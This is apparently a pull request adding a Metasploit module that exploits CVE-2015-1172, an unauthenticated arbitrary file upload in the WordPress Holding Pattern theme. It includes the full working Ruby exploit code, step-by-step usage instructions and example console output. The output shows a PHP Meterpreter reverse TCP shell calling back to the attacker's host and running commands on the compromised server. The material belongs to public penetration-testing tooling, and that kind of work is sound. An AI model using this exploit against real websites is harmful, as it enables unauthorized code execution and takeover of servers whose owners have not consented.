### PR TITLE
Add WordPress Holding Pattern file upload module

### DIFF
--- a/modules/exploits/unix/webapp/wp_holding_pattern_file_upload.rb
+++ b/modules/exploits/unix/webapp/wp_holding_pattern_file_upload.rb
@@ -32,7 +32,8 @@ class Metasploit3 < Msf::Exploit::Remote
       'References'      =>
         [
           ['CVE', '2015-1172'],
-          ['WPVDB', '7784']
+          ['WPVDB', '7784'],
+          ['URL', 'http://packetstormsecurity.com/files/130282/WordPress-Holding-Pattern-0.6-Shell-Upload.html']
         ],
       'DisclosureDate'  => 'Feb 11 2015',
       'Platform'        => 'php',

--- a/modules/exploits/unix/webapp/wp_holding_pattern_file_upload.rb
+++ b/modules/exploits/unix/webapp/wp_holding_pattern_file_upload.rb
@@ -1,0 +1,85 @@
+##
+# This module requires Metasploit: http://www.metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'socket'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::FileDropper
+  include Msf::HTTP::Wordpress
+
+  def initialize(info = {})
+    super(update_info(
+      info,
+      'Name'            => 'WordPress Holding Pattern Theme Arbitrary File Upload',
+      'Description'     => %q{
+          This module exploits a file upload vulnerability in all versions of the
+          Holding Pattern theme found in the upload_file.php script which contains
+          no session or file validation. It allows unauthenticated users to upload
+          files of any type and subsequently execute PHP scripts in the context of
+          the web server.
+        },
+      'License'         => MSF_LICENSE,
+      'Author'          =>
+        [
+          'Alexander Borg',                 # Vulnerability disclosure
+          'Rob Carr <rob[at]rastating.com>' # Metasploit module
+        ],
+      'References'      =>
+        [
+          ['CVE', '2015-1172'],
+          ['WPVDB', '7784']
+        ],
+      'DisclosureDate'  => 'Feb 11 2015',
+      'Platform'        => 'php',
+      'Arch'            => ARCH_PHP,
+      'Targets'         => [['holding_pattern', {}]],
+      'DefaultTarget'   => 0
+    ))
+  end
+
+  def rhost
+    datastore['RHOST']
+  end
+
+  def holding_pattern_uploads_url
+    normalize_uri(wordpress_url_themes, 'holding_pattern', 'uploads/')
+  end
+
+  def holding_pattern_uploader_url
+    normalize_uri(wordpress_url_themes, 'holding_pattern', 'admin', 'upload-file.php')
+  end
+
+  def generate_mime_message(payload, payload_name)
+    data = Rex::MIME::Message.new
+    target_ip = IPSocket.getaddress(rhost)
+    field_name = Rex::Text.md5(target_ip)
+    data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"#{field_name}\"; filename=\"#{payload_name}\"")
+    data
+  end
+
+  def exploit
+    print_status("#{peer} - Preparing payload...")
+    payload_name = "#{Rex::Text.rand_text_alpha(10)}.php"
+    data = generate_mime_message(payload, payload_name)
+
+    print_status("#{peer} - Uploading payload...")
+    res = send_request_cgi(
+      'method'    => 'POST',
+      'uri'       => holding_pattern_uploader_url,
+      'ctype'     => "multipart/form-data; boundary=#{data.bound}",
+      'data'      => data.to_s
+    )
+    fail_with(Failure::Unreachable, 'No response from the target') if res.nil?
+    fail_with(Failure::UnexpectedReply, "Server responded with status code #{res.code}") if res.code != 200
+    payload_url = normalize_uri(holding_pattern_uploads_url, payload_name)
+
+    print_status("#{peer} - Executing the payload at #{payload_url}")
+    register_files_for_cleanup(payload_name)
+    send_request_cgi({ 'uri' => payload_url, 'method'  => 'GET' }, 5)
+  end
+end


### PR DESCRIPTION
This module exploits a file upload vulnerability in all versions of the Holding Pattern theme found in the upload_file.php script which contains no session or file validation. It allows unauthenticated users to upload files of any type and subsequently execute PHP scripts in the context of the web server.
## References
- http://cvedetails.com/cve/2015-1172/
- https://wpvulndb.com/vulnerabilities/7784
## Verification
- [x] Download and install [WordPress](https://wordpress.org/download/)
- [x] Download the latest version of the theme at: http://www.creattor.com/wordpress-themes/holding-pattern-117
- [x] Extract the `holding_pattern` folder into the `/wp-content/themes/` directory inside your WordPress installation folder
- [x] Load msfconsole and `use exploit/unix/webapp/wp_holding_pattern_file_upload`
- [x] Set RHOST to the target's address
- [x] If running WordPress in a subdirectory, ensure to set TARGETURI appropriately (e.g. if running in a folder called wordpress, set TARGETURI to /wordpress/)
- [x] Set the payload
- [x] Run `exploit` to upload and execute the payload
## Example Output

```
msf > use exploit/unix/webapp/wp_holding_pattern_file_upload
msf exploit(wp_holding_pattern_file_upload) > set RHOST 192.168.1.15
RHOST => 192.168.1.15
msf exploit(wp_holding_pattern_file_upload) > set TARGETURI /wordpress/
TARGETURI => /wordpress/
msf exploit(wp_holding_pattern_file_upload) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf exploit(wp_holding_pattern_file_upload) > set LHOST 192.168.1.189
LHOST => 192.168.1.189
msf exploit(wp_holding_pattern_file_upload) > run

[*] Started reverse handler on 192.168.1.189:4444
[*] 192.168.1.15:80 - Preparing payload...
[*] 192.168.1.15:80 - Uploading payload...
[*] 192.168.1.15:80 - Executing the payload at /wordpress/wp-content/themes/holding_pattern/uploads/mahLgZHEbr.php
[*] Sending stage (40499 bytes) to 192.168.1.15
[*] Meterpreter session 2 opened (192.168.1.189:4444 -> 192.168.1.15:37097) at 2015-02-14 12:50:34 +0000
[+] Deleted mahLgZHEbr.php

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux ubuntu 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64
Meterpreter : php/php
meterpreter >
```
